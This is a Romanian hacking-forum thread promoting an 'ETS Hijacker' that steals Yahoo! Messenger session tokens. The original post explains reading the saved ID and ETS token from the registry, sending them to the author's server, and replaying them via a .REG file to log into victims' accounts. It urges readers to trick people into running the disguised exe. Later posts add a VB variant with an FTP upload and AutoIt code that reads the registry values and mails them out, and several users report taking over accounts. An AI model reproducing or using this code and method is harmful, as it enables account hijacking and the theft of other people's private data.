ETS Hijacker

[zippy]

da frumos...merge...mai ales ca unu mia luat ets si a intrat pa id meu

orcum degeba

salut Hellbound

[fLr^]

i-am dat programul cuiva, mi-a zis ca i-a dat eroare, iar cand am cautat pe site, nu arata nimic, (nu arata ETS)

[playftw]

Merci

fLr^ : Functioneaza doar atunci cand persoana respectiva are activat Remember my ID & Password.

[CODEX]

si pana la urma ce inseman hijack asta ?

[playftw]

hijack - deturnare

hijacked - deturnat, jefuit

http://ro-en.ro

[Ethereal]

nu credeti ca riscati trimitand ets-urile pe site-ul tipului care a scris asta?

[nosferatu]

nu credeti ca riscati trimitand ets-urile pe site-ul tipului care a scris asta?

Nu.

Il cunosc si nu este genu...

[zaiet-pagadi]

Aceasta este, probabil, ce mai simpla metoda de a sparge un cont de messenger. Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...

Atunci cand te loghezi pe Yahoo! Messenger, ai optiunea de a salva id-ul si parola, pentru logari ulterioare. ID-ul se salveaza in registri, si se mai salveaza un cod, ETS, in care se memoreaza token-ul de autentificare. Din token nu se poate extrage parola.

Ce inseamna asta? Daca extragi cele 2 informatii din registri, iar apoi le "plantezi" pe alt calculator, ai sa ai surpriza ca te poti loga cu id-ul si parola salvata, deci pe contul altcuiva, fara sa ii afli neaparat si parola.

Simplu, nu?

Am facut cu C++ un exe de dimensiuni mici, pe care il gasiti arhivat aici. Cand este lansat in executie, el extrage id-ul si ETS-ul, si le trimite pe un server. Cateva explicatii pe engleza, mai gasiti aici.

Dati exe-ul la cineva, si il convingeti sa il deschida. Programul va afisa un mesaj fals de eroare. Intrati pe http://it.octopis.com/ets.php, scrieti id-ul, si vedeti daca operatia a avut succes. Daca da, se va afisa id-ul si codul ETS. Click pe id, ca sa descarcati un fisier .REG, pe care il executati. Deschideti messenger-ul si surpriza!! Te-ai logat pe acel id! Ai acces la tot contul de Yahoo! + ca din moment ce ai acces la contul de e-mail, poti sa ii spargi conturile de pe hi5 / netlog / tagged (+ inca alte porcarii de saituri)...

SPOR LA FURAT!

Programul e mic si este bazat pe un principiu foarte simplu, iar sursa o tin sub cheie, pentru cei curiosi.

Saitul it.octopis.com e saitul meu, asa ca nu strica sa azvarliti o privire. Am pus 3-4 programele si mi-e o lene... sa mai adaug cateva.

frumos explicat cum de te-a lasat sa postezi asa ceva ????

asta se invata la grupa mica

Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...

give me warn pls

[stoman]

Functioneaza super:D am incercat si eu sa fac unul in VB(sper sa nu se supere crhi5ty ca i-am furat ideea citeste ETS-ul si ID-ul le pune intr-un reg si il trimite pe un ftp.nu stiu cat de detectabil e. io am kis si nu a comentat da bit defender l-a blocat. . partea naspa e ca ii trebe MSINET.OCX ca sa ruleze. aici e linku cu sursa

http://rapidshare.com/files/204208857/ETS-VB.rar.html

[Hellbound]

mai bine ati inchide topicu o dati in offtopic ... si lumea pune keyloggere (descriindule ca creatie propie )

[razvan_dc]

frate da io l-am testat la mine si merge da acum daca imi schimb parola o sa o mai ia odata?

esti super cu acest "exploit"

[Guest chri5ty]

1 - Nu inteleg ce e asa de super la virusul asta.

2 - Nu e exploit.

3 - Nu ma supar deloc daca fiecare isi face propria varianta a programului

4 - @zaiet-pagadi- nu prea imi place cand lumea citeaza mesaje intregi, doar ca sa exprime o idee scurta

5 - @zaiet-pagadi- "asta se invata la grupa mica". Apreciez superioritatea, dar se pare ca multe persoane de aici au chiulit de la lectia asta. Stiu ca e ceva simplu, dar mi-am dat seama si singur ca se face cam mult offtopic pe topicul asta. Ar trebui inchis, intrucat nu mai are nimeni noutati de adus. Mai multi spun ca le-a mers, altii care nu au citit prea atent, spun ca nu stiu de ce nu le-a mers... etc

[-=(Alex_sm26)=-]

E virusat!

[fLr^]

si ce?mie imi merge perfect. Te respect chri5ty pentru munca depusa!

[Guest chri5ty]

@-=(Alex_sm26)=-

Programul e un virus in sine. E un mic spion. Ce te-ai astepta? In orice caz, nu infecteaza sub nicio forma calculatorul; asta iti garantez eu, iar oricine are chef sa piarda ceva timp cu dezasamblor, iti va spune acelasi lucru.

Si daca tot incepe sa fie detectat ca virus (ceea ce era si de asteptat), atunci de ce nu va faceti singurei variante proprii? E asa de greu? Deja s-au publicat cateva surse si un program alternativ, principiul de functionare e extrem de simplu.

Incep sa cred ca majoritatea forumistilor de pe RST, sunt mai mult vorbareti decat descurcareti. Incep sa fiu chiar convins de asta . Nicio generalizare!

[Nytro]

Prea mult tam-tam pentru 5 linii de cod. Nu esti tu cel care se lega de BUNN si de programul lui care fura acest ETS?

[Guest chri5ty]

Vorbim de hackpedia...

M-am legat de BUNNN pentru faptul ca scotea pe banda o groaza de programe, care erau asemanatoare, in proportie de 90%, si nu avea de gand sa zica care e esenta programului.

Nu am nimic impotriva faptului ca si el a implementat functia pentru ETS in keyloggerul lui. Singura problema a programului e ca trimitea cam des e-mail-uri cu informatiile spionate.

Dar asta e cu totul alta poveste, si se incadreaza la offtopic

[bula]

Post deleted

Edited September 17, 2009 by bula

[hunter_pass]

Bun...merge! Dar mi-ati putea da o idee despre cum sa fac sa se trumita ets-ul pe site-ul meu?

Ca din cate am observat el are acces la toate id-urile

Edited June 26, 2009 by hunter_pass

[m1cr0]

Mie imi spune "Application Failed to initialize".... am net framework instalat.. nu cred ca are vreo legatura..

[pytycel]

Buna.

Te rog sa imi spui, dupa ce execut fisierul .REG, ce fac?

Deschid yahoo mess...si la ID si parola ce scriu?

Multumesc mult!

[all3xandra]

Dar o metoda de decriptare a tokenului, ar fii geniala:X.

[strike]

Dar o metoda de decriptare a tokenului, ar fii geniala:X.

Read this

Despre Yahoo! - RST

[phantomas90]

Sursa din AutoIT 3.x.x

$var1 = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "ETS")

$var2 = RegRead("HKEY_CURRENT_USER\Software\Yahoo\pager", "Yahoo! User ID")

#include <INet.au3>

$s_SmtpServer = "smtp.gmail.com"

$s_SmtpPort = 465

$s_SmtpSsl = 1

$s_SmtpUsername = "***"

$s_SmtpPassword = "***"

$s_FromName = "Mathiew"

$s_FromAddress = "mathiew.fantomas3@gmail.com"

$s_ToAddress = "pwd.reset@ymail.com"

$s_Subject = " tesul 2"

$as_Body = "bla "

$s_first = "bla"

$s_helo = "helo"

$b_trace = 0

$Response = _INetSmtpMail($s_SmtpServer,$s_SmtpPort,$s_SmtpSsl,$s_SmtpUsername,$s_SmtpPassword,$s_FromName,$s_FromAddress,$s_ToAddress)

$err = @error

If $Response = 1 Then

MsgBox(0, "Success!", "Mail sent")

Else

MsgBox(0, "Error!", "Mail failed with error code " & $err)

EndIf

Primele doua linii extrag ETS-ul si ID-ul...ia mai jos am incercat sa trimit un mail pe smtp si nu merge:((.Daca se poate postati va rog sursa..

La windows 7 au o valoare in registri numita MD_ID_value sau ceva de genu...valoarea pt aceasta nu e de forma unui ETS normal de la windows XP.

Incerc sa vad ce e si revin

Edited May 20, 2010 by phantomas90
am incercat pe windows 7

[Alynutza]

Pai partea buna e ca a mers

Partea proasta:A mers 2 minute pana nu stiu ce a facut ala(cred ca a schimbat parola)si apoi numai functioneaza...

Pot sa stiu si eu de ce numai mergE?a schimbat parola sau e el pe id?

Sau nu puteti face sa arate parola?